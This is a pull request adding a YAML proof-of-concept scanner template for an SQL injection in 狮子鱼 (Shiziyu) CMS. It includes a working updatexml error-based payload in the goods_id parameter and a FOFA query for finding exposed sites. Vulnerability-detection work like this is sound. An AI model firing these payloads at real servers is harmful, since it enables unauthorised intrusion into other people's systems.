### PR TITLE
狮子鱼CMS SQL Injection

### DIFF
--- a/shiziyu-cms-apicontroller-sql.yml
+++ b/shiziyu-cms-apicontroller-sql.yml
@@ -1,0 +1,12 @@
+name: poc-yaml-shiziyu-cms-apicontroller-sql
+set:
+  rand: randomInt(200000000, 210000000)
+rules:
+  - method: GET
+    path: /index.php?s=api/goods_detail&goods_id=1%20and%20updatexml(1,concat(0x7e,md5({{rand}}),0x7e),1)
+    expression:
+      response.body.bcontains(bytes(substr(md5(string(rand)),0,31)))
+detail:
+  author: sakura404x
+  links:
+    - https://blog.csdn.net/weixin_42633229/article/details/117070546


### PR DESCRIPTION
狮子鱼CMS SQL Injection

## 本 poc 是检测什么漏洞的
狮子鱼CMS ApiController.class.php 参数过滤存在不严谨，导致SQL注入漏洞

## 测试环境
FOFA语法：
"/seller.php?s=/Public/login"

## 备注
https://blog.csdn.net/weixin_42633229/article/details/117070546